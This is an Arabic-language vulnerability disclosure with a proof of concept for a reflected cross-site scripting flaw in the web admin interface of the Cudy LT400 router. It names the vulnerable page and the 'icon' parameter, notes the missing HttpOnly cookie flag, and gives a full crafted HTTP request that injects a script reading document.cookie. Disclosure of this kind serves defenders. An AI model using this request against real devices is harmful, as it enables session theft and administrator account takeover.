
إثبات مفهوم لثغرة XSS المنعكسة في واجهة الويب الخاصة بجهاز Cudy LT400، مع توضيح سرقة ملفات تعريف الجلسة والاستيلاء على صلاحيات المسؤول عبر طلبات مصممة خصيصًا.
يوجد هجوم نص برمجي عبر المواقع (XSS) منعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.
الصفحة /cgi-bin/luci/admin/network/bandwidth بها ثغرة XSS منعكسة عبر المعامل icon.
تتضمن طرق الاستغلال إرسال طلب مُصمم خصيصًا للضحية يتضمن كودًا خبيثًا.
التطبيق المتأثر لا يضع Session Cookie مع خاصية HttpOnly؛ مما قد يؤدي إلى الاستيلاء على حساب المسؤول عبر سرقة رمز الجلسة.
GET /cgi-bin/luci/admin/network/bandwidth?iface=4g&icon=icon-4g%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&i18name=Cellular HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology